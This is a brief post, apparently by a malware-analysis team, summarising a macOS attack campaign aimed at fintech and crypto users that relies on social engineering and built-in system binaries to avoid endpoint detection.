  • Who is at risk: Fintech, crypto, and high-value environments where macOS is widely used by developers, executives, and decision-makers. 
  • The attack relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools.
u/ANYRUN-team — 23 days ago